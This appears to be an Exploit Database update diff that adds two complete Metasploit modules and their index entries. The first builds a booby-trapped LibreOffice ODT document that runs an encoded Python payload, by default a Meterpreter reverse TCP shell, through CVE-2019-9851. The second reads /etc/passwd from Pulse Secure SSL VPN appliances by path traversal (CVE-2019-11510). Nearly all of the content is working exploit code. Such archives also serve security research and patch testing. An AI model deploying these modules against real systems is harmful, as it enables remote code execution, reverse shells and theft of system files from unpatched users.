DB: 2019-08-22

2 changes to exploits/shellcodes

LibreOffice < 6.2.6 Macro - Python Code Execution (Metasploit)

Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure (Metasploit)

exploits/multiple/remote/47298.rb

@@ -0,0 +1,74 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'LibreOffice Macro Python Code Execution',
+      'Description'     => %q{
+        LibreOffice comes bundled with sample macros written in Python and
+        allows the ability to bind program events to them.
+
+        LibreLogo is a macro that allows a program event to execute text as Python code, allowing RCE.
+
+        This module generates an ODT file with a dom loaded event that,
+        when triggered, will execute arbitrary python code and the metasploit payload.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Nils Emmerich',    # Vulnerability discovery and PoC
+          'Shelby Pace',      # Base module author (CVE-2018-16858), module reviewer and platform-independent code
+          'LoadLow',          # This msf module
+          'Gabriel Masei'     # Global events vuln. disclosure
+        ],
+      'References'      =>
+        [
+          [ 'CVE', '2019-9851' ],
+          [ 'URL', 'https://www.libreoffice.org/about-us/security/advisories/cve-2019-9848/' ],
+          [ 'URL', 'https://www.libreoffice.org/about-us/security/advisories/cve-2019-9851/' ],
+          [ 'URL', 'https://insinuator.net/2019/07/libreoffice-a-python-interpreter-code-execution-vulnerability-cve-2019-9848/' ]
+        ],
+      'DisclosureDate'  => '2019-07-16',
+      'Platform'        => 'python',
+      'Arch'            => ARCH_PYTHON,
+      'DefaultOptions'  => { 'Payload' => 'python/meterpreter/reverse_tcp' },
+      'Targets'         => [ ['Automatic', {}] ],
+      'DefaultTarget'   =>  0
+    ))
+
+    register_options(
+    [
+      OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt']),
+      OptString.new('TEXT_CONTENT', [true, 'Text written in the document. It will be html encoded.', 'My Report']),
+    ])
+  end
+
+  def gen_file
+    text_content = Rex::Text.html_encode(datastore['TEXT_CONTENT'])
+    py_code = Rex::Text.encode_base64(payload.encoded)
+    @cmd = "exec(eval(str(__import__('base64').b64decode('#{py_code}'))))"
+    @cmd = Rex::Text.html_encode(@cmd)
+
+    fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-9848', 'librefile.erb'))
+    libre_file = ERB.new(fodt_file).result(binding())
+
+    print_status("File generated! Now you need to move the odt file and find a way to send it/open it with LibreOffice on the target.")
+
+    libre_file
+  rescue Errno::ENOENT
+    fail_with(Failure::NotFound, 'Cannot find template file')
+  end
+
+  def exploit
+    fodt_file = gen_file
+
+    file_create(fodt_file)
+  end
+end

exploits/multiple/webapps/47297.rb

@@ -0,0 +1,76 @@
+# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit)
+# Google Dork: inurl:/dana-na/ filetype:cgi
+# Date: 8/20/2019
+# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera
+# Vendor Homepage: https://pulsesecure.net
+# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
+# Tested on: Linux
+# CVE : CVE-2019-11510 
+require 'msf/core'
+class MetasploitModule < Msf::Auxiliary
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Post::File
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Pulse Secure - System file leak',
+			'Description'    => %q{
+				Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.
+        This exploit reads /etc/passwd as a proof of concept
+        This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
+			},
+			'References'     =>
+			    [
+			        [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ]
+			    ],
+			'Author'         => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ],
+			'License'        => MSF_LICENSE,
+			 'DefaultOptions' =>
+		      {
+		        'RPORT' => 443,
+		        'SSL' => true
+		      },
+			))
+
+	end
+
+
+	def run()
+		print_good("Checking target...")
+		res = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342)
+
+		if res && res.code == 200
+			print_good("Target is Vulnerable!")
+			data = res.body
+			current_host = datastore['RHOST']
+			filename = "msf_sslwebsession_"+current_host+".bin"
+			File.delete(filename) if File.exist?(filename)
+			file_local_write(filename, data)
+			print_good("Parsing file.......")
+			parse()
+		else
+			if(res && res.code == 404)
+				print_error("Target not Vulnerable")
+			else
+				print_error("Ooof, try again...")
+			end
+		end
+	end
+	def parse()
+		current_host = datastore['RHOST']
+
+	    fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r")
+	    words = 0
+	    while (line = fileObj.gets)
+	    	printable_data = line.gsub(/[^[:print:]]/, '.')
+	    	array_data = printable_data.scan(/.{1,60}/m)
+	    	for ar in array_data
+	    		if ar != "............................................................"
+	    			print_good(ar)
+	    		end
+	    	end
+	    	#print_good(printable_data)
+
+		end
+		fileObj.close
+	end
+end

files_exploits.csv

@@ -17636,6 +17636,7 @@ id,file,description,date,author,type,platform,port
 47243,exploits/php/remote/47243.py,"Agent Tesla Botnet - Arbitrary Code Execution",2019-08-13,prsecurity,remote,php,
 47244,exploits/php/remote/47244.py,"AZORult Botnet - SQL Injection",2019-08-13,prsecurity,remote,php,
 47256,exploits/php/remote/47256.rb,"Agent Tesla Botnet - Arbitrary Code Execution (Metasploit)",2019-08-14,"Ege Balci",remote,php,
+47298,exploits/multiple/remote/47298.rb,"LibreOffice < 6.2.6 Macro - Python Code Execution (Metasploit)",2019-08-21,LoadLow,remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41618,6 +41619,7 @@ id,file,description,date,author,type,platform,port
 47199,exploits/php/webapps/47199.txt,"WebIncorp ERP - SQL injection",2019-08-01,n1x_,webapps,php,80
 47203,exploits/hardware/webapps/47203.html,"Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery",2019-08-01,"Alperen Soydan",webapps,hardware,80
 47204,exploits/php/webapps/47204.txt,"Sar2HTML 3.2.1 - Remote Command Execution",2019-08-02,"Cemal Cihad ÇİFTÇİ",webapps,php,80
+47297,exploits/multiple/webapps/47297.rb,"Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure (Metasploit)",2019-08-21,"Alyssa Herrera",webapps,multiple,
 47205,exploits/php/webapps/47205.txt,"Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection",2019-08-02,n1x_,webapps,php,80
 47206,exploits/php/webapps/47206.txt,"1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting",2019-08-02,"Kusol Watchara-Apanukorn",webapps,php,80
 47210,exploits/php/webapps/47210.txt,"WordPress Plugin JoomSport 3.3 - SQL Injection",2019-08-07,"Pablo Santiago",webapps,php,80